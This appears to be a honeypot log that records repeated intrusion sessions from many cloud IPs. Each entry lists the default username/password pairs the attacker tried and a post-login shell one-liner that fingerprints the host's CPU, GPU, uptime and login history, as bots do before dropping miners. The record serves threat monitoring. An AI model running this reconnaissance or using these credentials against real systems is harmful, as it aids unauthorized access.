$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 autobahn_root_18 (164.92.254.161) — Frankfurt am Main, Germany · 8 sessions · 32 cmds

2026-03-01 15:59 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 dutch_root_15 (64.227.71.143) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-01 16:01 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 monsoon_root_12 (139.59.91.72) — Bengaluru, India · 1 session · 4 cmds

2026-03-01 15:48 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 scone_root_6 (134.122.96.190) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-01 15:43 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 blitz_root_3 (209.38.219.214) — Frankfurt am Main, Germany · 6 sessions · 24 cmds

2026-03-01 14:16 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 crumpet_root_13 (138.68.156.96) — Slough, United Kingdom · 1 session · 4 cmds

2026-03-01 15:23 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 gouda_root_2 (146.190.28.60) — Amsterdam, Netherlands · 10 sessions · 40 cmds

2026-03-01 14:19 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 reef_root_9 (134.199.163.86) — Sydney, Australia · 6 sessions · 24 cmds

2026-03-01 15:06 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 clog_root_5 (164.92.147.99) — Amsterdam, Netherlands · 2 sessions · 8 cmds

2026-03-01 14:22 EST · as root/admin, root/toor

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 strudel_root_16 (46.101.101.126) — Frankfurt am Main, Germany · 5 sessions · 20 cmds

2026-03-01 13:42 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 blitz_root_12 (161.35.218.148) — Frankfurt am Main, Germany · 6 sessions · 24 cmds

2026-03-01 13:35 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 blitz_root_13 (159.89.14.104) — Frankfurt am Main, Germany · 7 sessions · 28 cmds

2026-03-01 13:21 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 tea_root_3 (165.232.106.12) — Slough, United Kingdom · 8 sessions · 32 cmds

2026-03-01 13:37 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 toque_root_4 (68.183.204.132) — Toronto, Canada · 1 session · 4 cmds

2026-03-01 13:24 EST · as root/1234

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 cowboy_root_5 (198.199.90.152) — North Bergen, United States · 8 sessions · 32 cmds

2026-03-01 12:10 EST · as admin/admin, admin/password, root/1234

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 cowboy_root_2 (161.35.4.186) — North Bergen, United States · 13 sessions · 52 cmds

2026-03-01 12:07 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 13x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×13

$ uname -s -v -n -m 2 > /dev/null ×13

$ uname -m 2 > /dev/null ×13

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×13

🎭 monsoon_root_13 (139.59.11.187) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-01 12:33 EST · as pi/raspberry, ubuntu/ubuntu

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); 